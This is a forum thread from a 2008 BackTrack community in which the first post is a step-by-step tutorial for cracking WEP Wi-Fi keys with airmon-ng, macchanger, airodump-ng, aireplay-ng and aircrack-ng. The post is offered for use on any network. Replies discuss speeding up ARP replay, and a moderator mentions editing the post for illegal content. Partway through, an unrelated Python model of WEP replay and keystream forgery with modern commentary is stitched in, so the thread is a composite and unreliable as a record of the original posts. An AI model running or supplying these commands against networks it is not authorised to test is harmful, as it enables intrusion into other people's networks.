Remote Exploit Forums



BackTrack3 Howtos Add your howto articles / tutorials here.

#1
Old 11-15-2008, 09:25 PM
-wOne
Junior Member
 
Join Date: Nov 2008
Posts: 6
WiFi Hacking 101

OK folks, in this tutorial I am going to show you how to crack WEP, sniff non-SSL and some SSL passwords over a wireless network, and sniff MSN chats.

Part 1: Cracking WEP

My way of cracking WEP is a little different from other ways, but it gets the job done quicker than everyone else's way.

So you will need BackTrack 3 and a supported wifi card that can go into monitor mode (I have a Ralink 2500 card (ra0)).

Open up a shell.

OK, so first we need to stop our wireless card, so we do the airmon command:

airmon-ng stop [wifi card extension, e.g. ath0]

Now let's change our MAC address:

macchanger --mac 00:11:22:33:44:55 [wifi card extension]

Now let's fire our card up in monitor mode:

airmon-ng start [wifi card extension]

Now we need the MAC address of the AP we are hacking, so let's do:

airodump-ng [wifi card extension]

Now you will see your AP. Take note of the MAC address/BSSID and the channel, then hit CTRL+C to stop airodump jumping channels or you will run into problems later on.

Now let's start capturing the data packets we need for the hack, so type:

airodump-ng -c [channel] -b [BSSID/MAC address of AP] -w [filename] [wifi card extension]

So for example:

airodump-ng -c 1 -b 01:1b:11:78:d9:f2 -w linksys ra0

Once you have run that command you should see some info come up: clients, MAC address, channel, data etc. Now you should see the data filling up. We need the data to get to about 10-15 thousand to crack the key, so we need to speed it up so that we get a lot of data in a short space of time.

We are now going to use aireplay, so open up another shell and type:

aireplay-ng -1 0 -a [AP MAC address/BSSID] -h [faked MAC address] [wifi card extension]

For example:

aireplay-ng -1 0 -a 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

Now, once you see "authentication successful", proceed to replay a data packet to the access point, which will force it to send out lots of packets we can use to crack the key, so do:

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [AP MAC address/BSSID] -h [faked MAC address] [wifi card extension]

For example:

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

Now aireplay will start reading the packets, and once it finds one you can use for the hack it will prompt you: use this packet? Just hit y then enter. Now on the airodump shell you will see the data filling up very fast. Once it gets to 10,000 run this command:

aircrack-ng -b [MAC address/BSSID] [file name you used earlier + -01.cap]

For example:

aircrack-ng -b 02:1b:11:78:d9:f2 linksys-01.cap

and aircrack will start decrypting the packets/IVs and find the WEP key!

If this is your first time doing WEP cracking it should take about 10-20 mins at first, and you will start progressing to 8 mins, 5 mins, 3 mins etc.

Other tutorials to follow! [[it's 03:45am in the UK :O]]

Thanks for reading!!

Will also get some screenshots up tomorrow.

Last edited by pureh@te; 11-16-2008 at 10:17 AM.
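Why the replay step in the post works at all is worth seeing in code. The following is an added example, not part of the original post and not aircrack-ng's code: a minimal WEP model (RC4 keyed with IV || root key, CRC-32 ICV; the key-index byte and 802.11 header are left out) with a constructed 40-bit key and a constructed ARP request. It shows the two properties aireplay-ng -3 depends on: WEP has no replay protection, so a captured ARP request is accepted again as-is, and the first 16 bytes of every ARP request are predictable, so ciphertext XOR known plaintext yields the keystream for that IV without knowing the key, enough to forge a short frame with a valid ICV. It does not implement the statistical key recovery (FMS/PTW) that aircrack-ng runs over the collected IVs.

```python
import struct
import zlib

# Constructed 40-bit WEP key for the demo; the attacker-side functions never read it.
ROOT_KEY = bytes.fromhex("1122334455")

# Every ARP request carried over WEP starts with the same 16 bytes: the LLC/SNAP
# header for EtherType 0x0806, then ARP hardware type 1, protocol type 0x0800,
# address lengths 6 and 4, and opcode 1 (request). That is the known plaintext.
KNOWN_ARP_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling, then n bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(root_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Station/AP side. Frame = IV || (payload || ICV) XOR RC4(IV || root_key)."""
    ks = rc4_keystream(iv + root_key, len(payload) + 4)
    return iv + xor(payload + icv(payload), ks)


def wep_decrypt(root_key: bytes, frame: bytes):
    """AP side. Returns (payload, icv_ok). There is no sequence counter, so a
    frame that was accepted once is accepted every time it is replayed."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + root_key, len(body)))
    payload, tag = plain[:-4], plain[-4:]
    return payload, tag == icv(payload)


def recover_keystream(frame: bytes, known_prefix: bytes = KNOWN_ARP_PREFIX):
    """Attacker side: ciphertext XOR predictable plaintext = keystream for this IV."""
    iv, body = frame[:3], frame[3:]
    return iv, xor(body[: len(known_prefix)], known_prefix)


def forge_frame(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    """Attacker side: encrypt a chosen payload under a recovered keystream. The ICV
    is a CRC over plaintext the attacker chose, so it verifies without the key."""
    plain = payload + icv(payload)
    if len(plain) > len(keystream):
        raise ValueError(f"need {len(plain)} keystream bytes, have {len(keystream)}")
    return iv + xor(plain, keystream)


def demo():
    # Constructed ARP request "who has 192.168.1.1? tell 192.168.1.50" from 00:11:22:33:44:55.
    arp_request = (KNOWN_ARP_PREFIX
                   + bytes.fromhex("001122334455") + bytes([192, 168, 1, 50])
                   + bytes(6) + bytes([192, 168, 1, 1]))
    captured = wep_encrypt(ROOT_KEY, bytes.fromhex("0a0b0c"), arp_request)

    # 1. Replay: the identical frame is accepted again (what aireplay-ng -3 exploits).
    replay_ok = wep_decrypt(ROOT_KEY, captured)[1]

    # 2. Keystream recovery from the predictable ARP prefix, without the key.
    iv, ks = recover_keystream(captured)
    ks_correct = ks == rc4_keystream(iv + ROOT_KEY, len(ks))

    # 3. Forgery: 12 chosen bytes plus a 4-byte ICV fit the 16 recovered keystream bytes.
    payload, forged_ok = wep_decrypt(ROOT_KEY, forge_frame(iv, ks, b"forged-data!"))
    return replay_ok, ks_correct, payload, forged_ok


if __name__ == "__main__":
    print(demo())
```

The forged frame is accepted because the ICV is a plain CRC-32, which an attacker can compute for any plaintext; a MAC keyed with a secret would stop this. Each replayed ARP request makes the AP answer under a fresh IV, which is where the IVs that airodump-ng counts and aircrack-ng later consumes come from.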
#2
Old 11-16-2008, 02:33 AM
Virchanza
Senior Member
 
Join Date: Sep 2008
Location: I am not living
Posts: 809
Default

Quote:
now once you see authentication successful proceed to replay a data packet to the access point
I set it replaying before I do fake associations; I don't wanna miss any ARPs.
__________________
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
#3
Old 11-16-2008, 04:43 AM
Banned
 
Join Date: Oct 2008
Location: Under The Bridge
Posts: 61

Quote:
Originally Posted by -wOne View Post
airodump-ng [wifi card extension] now you will see the ************************************************** ***************
I think this part is gonna create some fuss... But other than that it seems OK, I guess. I just don't get how this guide is faster than the other ones. Also there are so many similar guides, so why reinvent the wheel?

Edit: In my opinion, the fastest way is wesside-ng or spoonwep.

Last edited by pureh@te; 11-16-2008 at 08:20 AM.
#4
Old 11-16-2008, 07:21 AM
=Tron=
Senior Member
 
Join Date: Apr 2008
Location: The land of a thousand lakes
Posts: 2,035

Quote:
Originally Posted by -wOne View Post
my way of cracking wep is a little different than other ways but it gets the job done quicker than everyone else's way.
I have a hard time figuring out how this tutorial/method differs from any of the other tutorials out there and which part it is that would make it superior to them, apart from perhaps using the frame control option which is not specifically mentioned in many tutorials. Other than that it seems like a solid write-up on one of the most basic attacks (ARP-replay) available in aireplay-ng.
__________________
-Monkeys are like nature's humans.

Last edited by =Tron=; 11-16-2008 at 07:25 AM.
#5
Old 11-16-2008, 08:17 AM
Deathray
Senior Member
 
Join Date: Oct 2007
Location: Vejle, Denmark
Posts: 380

Quote:
Originally Posted by Virchanza View Post
I set it replaying before I do fake associations, I don't wanna miss any ARP's.
Why have I never thought of that before?
In every single WEP tutorial I have read, I have never stumbled upon anyone who said to start replaying before the association. Does that really work? Does a fake association really generate ARP packets on the network?
If so, that would really speed up the process if no clients are connected.
__________________
- Poul Wittig
#6
Old 11-16-2008, 08:25 AM
pureh@te
Jenkem Addict
 
Join Date: Mar 2007
Location: /dev/null
Posts: 5,549

I have edited the post and let the OP of with a warning on his discussion of illegal behavior because it was a borderline offense. What bothers me more is the lack of people using spell check on their posts so I have spell checked the original post and I would encourage people to use spell check and not use l33t speak or whatever the F**k its called if you want a intelligent response from any of the senior members here.
#7
Old 11-16-2008, 08:56 AM
streaker69
Senior Member
 
Join Date: May 2007
Location: Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
Posts: 3,665

Although the formatting is acceptable, I suggest that anyone who is including embedded commands inside text use 'code' tags around those commands. It just makes it easier to read and follow.

...and the Shift key was invented for a reason.
__________________
A 3rd Party Security Audit is the IT equivalent of a Colonoscopy, it's long, intrusive, and when it's done you'll have seen a lot of things you really didn't want to see, and you'd definitely remember that you had it done.

I baby harp seals.
#8
Old 11-16-2008, 12:58 PM
ShadowKill
Senior Member
 
Join Date: Dec 2007
Location: /dev/null
Posts: 918

Quote:
Originally Posted by pureh@te View Post
I have edited the post and let the OP of with a warning on his discussion of illegal behavior because it was a borderline offense. What bothers me more is the lack of people using spell check on their posts so I have spell checked the original post and I would encourage people to use spell check and not use l33t speak or whatever the F**k its called if you want a intelligent response from any of the senior members here.
Gotcha! Put the stick away, you know I <3 you....
__________________
"The goal of every man should be to continue living even after he can no longer draw breath."

~ShadowKill
#9
Old 11-17-2008, 12:24 PM
krymsunmortis
Junior Member
 
Join Date: Mar 2008
Location: Fort Worth Texas
Posts: 21

Now now, ShadowKill, you have to note pureh@te did say "spell check", not grammar check :P

So with that pointed out... did you really get him?
#10
Old 11-17-2008, 06:03 PM
ShadowKill
Senior Member
 
Join Date: Dec 2007
Location: /dev/null
Posts: 918

Quote:
Originally Posted by krymsunmortis View Post
Now Now ShadowKill you have to note Pureh@te did say "spell check" not grammar check :P

So with that pointed out ...... Did you really get him ?
Yes....yes I did. Perhaps not on the application of the word an, but most definitely on the misspelling of off. Need directions to Merriam's?
__________________
"The goal of every man should be to continue living even after he can no longer draw breath."

~ShadowKill